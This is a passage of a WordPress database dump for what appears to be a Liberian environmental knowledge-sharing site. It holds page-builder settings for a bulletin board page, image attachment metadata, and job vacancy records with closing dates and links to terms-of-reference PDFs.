Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(31596,4470,'_elementor_version','3.4.0'),(31597,4470,'_elementor_template_type','wp-page'),(31598,4470,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(31600,4470,'_elementor_pro_version','3.3.6'),(31604,4473,'_elementor_edit_mode','builder'),(31605,4473,'_elementor_template_type','wp-page'),(31606,4473,'_elementor_version','3.4.3'),(31607,4473,'_wp_page_template','default'),(31608,4473,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\",\"motion_fx_devices\":[\"desktop\"]},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.28999999999999914734871708787977695465087890625},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.010999999999999232613845379091799259185791015625},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(31610,4473,'_elementor_pro_version','3.3.6'),(31611,4473,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:4;s:11:\"header_size\";i:4;s:5:\"align\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:3;s:26:\"typography_text_decoration\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:8:\"advanced\";a:1:{s:15:\"section_effects\";a:1:{s:17:\"motion_fx_devices\";i:1;}}}}s:5:\"posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:3:{s:14:\"section_layout\";a:8:{s:5:\"_skin\";i:1;s:20:\"custom_template_list\";i:1;s:20:\"custom_skin_template\";i:1;s:18:\"custom_same_height\";i:1;s:14:\"custom_link_to\";i:1;s:14:\"custom_columns\";i:1;s:21:\"custom_posts_per_page\";i:1;s:15:\"custom_postlink\";i:1;}s:13:\"section_query\";a:1:{s:15:\"posts_post_type\";i:1;}s:18:\"section_pagination\";a:1:{s:15:\"pagination_type\";i:1;}}s:5:\"style\";a:2:{s:28:\"custom_section_design_layout\";a:2:{s:17:\"custom_column_gap\";i:1;s:14:\"custom_row_gap\";i:1;}s:24:\"section_pagination_style\";a:2:{s:18:\"pagination_spacing\";i:1;s:22:\"pagination_spacing_top\";i:1;}}}}}'),(31619,4478,'_wp_attached_file','2021/11/Safeguard-Officer-ToR-MMCRP.pdf'),(31620,4479,'_wp_attached_file','2021/11/Procurement-Expert-ToR-MMCRP.pdf'),(31621,4480,'_wp_attached_file','2021/11/Procurement-Assistant-ToR-MMCRP.pdf'),(31622,4481,'_wp_attached_file','2021/11/Gender-Specialist-TOR.pdf'),(31623,4482,'_wp_attached_file','2021/11/Gender-Officer-ToR-MMCRP.pdf'),(31624,4483,'_wp_attached_file','2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf'),(31625,4485,'_last_editor_used_jetpack','classic-editor'),(31626,4485,'_edit_lock','1638823302:42'),(31627,4485,'_edit_last','42'),(31628,4485,'_wp_page_template','default'),(31629,4485,'_wp_old_date','2021-12-02'),(31630,4485,'closed_date','2021-12-15'),(31631,4485,'owner','EPA'),(31632,4485,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/11/Admin-and-Finance-Assistant-ToR-MMCRP.pdf'),(31633,4489,'_last_editor_used_jetpack','classic-editor'),(31634,4489,'_edit_lock','1638823220:42'),(31635,4489,'_edit_last','42'),(31636,4489,'_wp_page_template','default'),(31637,4489,'_wp_old_date','2021-12-02'),(31638,4489,'closed_date','2021-12-15'),(31639,4489,'owner','EPA'),(31640,4489,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Officer-ToR-MMCRP.pdf'),(31641,4492,'_last_editor_used_jetpack','classic-editor'),(31642,4492,'_edit_lock','1638823638:42'),(31643,4492,'_edit_last','42'),(31644,4492,'_wp_page_template','default'),(31645,4492,'_wp_old_date','2021-12-02'),(31646,4492,'closed_date','2021-12-15'),(31647,4492,'owner','EPA'),(31648,4492,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/11/Gender-Specialist-TOR.pdf'),(31649,4494,'_last_editor_used_jetpack','classic-editor'),(31650,4494,'_edit_lock','1638823586:42'),(31651,4494,'_edit_last','42'),(31652,4494,'_wp_page_template','default'),(31653,4494,'_wp_old_date','2021-12-02'),(31654,4494,'closed_date','2021-12-15'),(31655,4494,'owner','EPA'),(31656,4494,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf'),(31657,4496,'_last_editor_used_jetpack','classic-editor'),(31658,4496,'_edit_lock','1638823660:42'),(31659,4496,'_edit_last','42'),(31660,4496,'_wp_page_template','default'),(31661,4496,'_wp_old_date','2021-12-02'),(31662,4496,'closed_date','2021-12-15'),(31663,4496,'owner','EPA'),(31664,4496,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/11/Procurement-Assistant-ToR-MMCRP.pdf'),(31665,4498,'_last_editor_used_jetpack','classic-editor'),(31666,4498,'_edit_lock','1638823259:42'),(31667,4498,'_edit_last','42'),(31668,4498,'_wp_page_template','default'),(31669,4498,'_wp_old_date','2021-12-06'),(31670,4498,'closed_date','2021-12-15'),(31671,4498,'owner','EPA'),(31672,4498,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/11/Safeguard-Officer-ToR-MMCRP.pdf'),(31673,4507,'_wp_attached_file','2021/12/ToR-NDC-Tracking_FINAL-VERSION.pdf'),(31674,4508,'_last_editor_used_jetpack','classic-editor'),(31675,4508,'_edit_lock','1638823780:42'),(31676,4508,'_edit_last','42'),(31677,4508,'_wp_page_template','default'),(31678,4508,'_wp_old_date','2021-12-06'),(31679,4508,'closed_date','2021-12-08'),(31680,4508,'owner','EPA'),(31681,4508,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-NDC-Tracking_FINAL-VERSION.pdf'),(31682,4510,'_last_editor_used_jetpack','classic-editor'),(31683,4510,'_edit_lock','1638824212:42'),(31684,4510,'_edit_last','42'),(31685,4511,'_wp_attached_file','2021/12/ToR-Policy-Assessment_FINAL_VERSION.pdf'),(31686,4510,'_wp_page_template','default'),(31687,4510,'_wp_old_date','2021-12-06'),(31688,4510,'closed_date','2021-12-08'),(31689,4510,'owner','EPA'),(31690,4510,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-Policy-Assessment_FINAL_VERSION.pdf'),(31691,4514,'_edit_lock','1639652525:42'),(31692,4514,'_last_editor_used_jetpack','block-editor'),(31693,4515,'_wp_attached_file','2021/12/epa.png'),(31694,4515,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/12/epa.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"epa-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"epa-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"epa-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"epa-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"epa-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"epa-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"epa-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31697,4514,'_wp_old_date','2021-12-16'),(31698,4514,'_thumbnail_id','4515'),(31699,4514,'_edit_last','42'),(31700,4514,'kava_extra_enable_breadcrumbs','inherit'),(31701,4514,'post_formats',''),(31702,4514,'gallery_tab',''),(31703,4514,'kava_extra_gallery_images',''),(31704,4514,'link_tab',''),(31705,4514,'kava_extra_link',''),(31706,4514,'kava_extra_link_target','_blank'),(31707,4514,'quote_tab',''),(31708,4514,'kava_extra_quote_text',''),(31709,4514,'kava_extra_quote_cite',''),(31710,4514,'audio_tab',''),(31711,4514,'kava_extra_audio',''),(31712,4514,'kava_extra_audio_loop','false'),(31713,4514,'kava_extra_audio_autoplay','false'),(31714,4514,'kava_extra_audio_preload','false'),(31715,4514,'video_tab',''),(31716,4514,'kava_extra_video_type','library'),(31717,4514,'kava_extra_video_library',''),(31718,4514,'kava_extra_video_external',''),(31719,4514,'kava_extra_video_poster',''),(31720,4514,'kava_extra_video_width','770'),(31721,4514,'kava_extra_video_height','480'),(31722,4514,'kava_extra_video_loop','false'),(31723,4514,'kava_extra_video_autoplay','false'),(31724,4514,'kava_extra_video_preload','false'),(31725,4517,'_edit_lock','1639652918:42'),(31726,4517,'_last_editor_used_jetpack','block-editor'),(31727,4518,'_wp_attached_file','2021/12/waste.png'),(31728,4518,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2021/12/waste.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"waste-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"waste-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"waste-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"waste-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"waste-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"waste-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"waste-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"waste-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"waste-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"waste-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"waste-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31731,4517,'_wp_old_date','2021-12-16'),(31732,4517,'_thumbnail_id','4518'),(31733,4517,'_edit_last','42'),(31734,4517,'kava_extra_enable_breadcrumbs','inherit'),(31735,4517,'post_formats',''),(31736,4517,'gallery_tab',''),(31737,4517,'kava_extra_gallery_images',''),(31738,4517,'link_tab',''),(31739,4517,'kava_extra_link',''),(31740,4517,'kava_extra_link_target','_blank'),(31741,4517,'quote_tab',''),(31742,4517,'kava_extra_quote_text',''),(31743,4517,'kava_extra_quote_cite',''),(31744,4517,'audio_tab',''),(31745,4517,'kava_extra_audio',''),(31746,4517,'kava_extra_audio_loop','false'),(31747,4517,'kava_extra_audio_autoplay','false'),(31748,4517,'kava_extra_audio_preload','false'),(31749,4517,'video_tab',''),(31750,4517,'kava_extra_video_type','library'),(31751,4517,'kava_extra_video_library',''),(31752,4517,'kava_extra_video_external',''),(31753,4517,'kava_extra_video_poster',''),(31754,4517,'kava_extra_video_width','770'),(31755,4517,'kava_extra_video_height','480'),(31756,4517,'kava_extra_video_loop','false'),(31757,4517,'kava_extra_video_autoplay','false'),(31758,4517,'kava_extra_video_preload','false'),(31759,4520,'_edit_lock','1639658048:42'),(31760,4520,'_last_editor_used_jetpack','block-editor'),(31761,4521,'_wp_attached_file','2021/12/bea-mountain.png'),(31762,4521,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2021/12/bea-mountain.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"bea-mountain-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"bea-mountain-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"bea-mountain-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"bea-mountain-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:23:\"bea-mountain-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:24:\"bea-mountain-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:24:\"bea-mountain-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:24:\"bea-mountain-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:24:\"bea-mountain-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:24:\"bea-mountain-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:24:\"bea-mountain-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31765,4520,'_wp_old_date','2021-12-16'),(31766,4520,'_thumbnail_id','4521'),(31767,4520,'_edit_last','42'),(31768,4520,'kava_extra_enable_breadcrumbs','inherit'),(31769,4520,'post_formats',''),(31770,4520,'gallery_tab',''),(31771,4520,'kava_extra_gallery_images',''),(31772,4520,'link_tab',''),(31773,4520,'kava_extra_link',''),(31774,4520,'kava_extra_link_target','_blank'),(31775,4520,'quote_tab',''),(31776,4520,'kava_extra_quote_text',''),(31777,4520,'kava_extra_quote_cite',''),(31778,4520,'audio_tab',''),(31779,4520,'kava_extra_audio',''),(31780,4520,'kava_extra_audio_loop','false'),(31781,4520,'kava_extra_audio_autoplay','false'),(31782,4520,'kava_extra_audio_preload','false'),(31783,4520,'video_tab',''),(31784,4520,'kava_extra_video_type','library'),(31785,4520,'kava_extra_video_library',''),(31786,4520,'kava_extra_video_external',''),(31787,4520,'kava_extra_video_poster',''),(31788,4520,'kava_extra_video_width','770'),(31789,4520,'kava_extra_video_height','480'),(31790,4520,'kava_extra_video_loop','false'),(31791,4520,'kava_extra_video_autoplay','false'),(31792,4520,'kava_extra_video_preload','false'),(31795,4524,'_edit_lock','1639739855:42'),(31796,4524,'_last_editor_used_jetpack','block-editor'),(31797,4525,'_wp_attached_file','2021/12/Prof.-Tarpeh.jpg'),(31798,4525,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1088;s:6:\"height\";i:1243;s:4:\"file\";s:24:\"2021/12/Prof.-Tarpeh.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-263x300.jpg\";s:5:\"width\";i:263;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Prof.-Tarpeh-896x1024.jpg\";s:5:\"width\";i:896;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-768x877.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:877;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:23:\"Prof.-Tarpeh-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:25:\"Prof.-Tarpeh-1088x650.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"kava-thumb-xl\";a:4:{s:4:\"file\";s:26:\"Prof.-Tarpeh-1088x1080.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-600x685.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:24:\"Prof.-Tarpeh-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:25:\"Prof.-Tarpeh-1088x640.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s: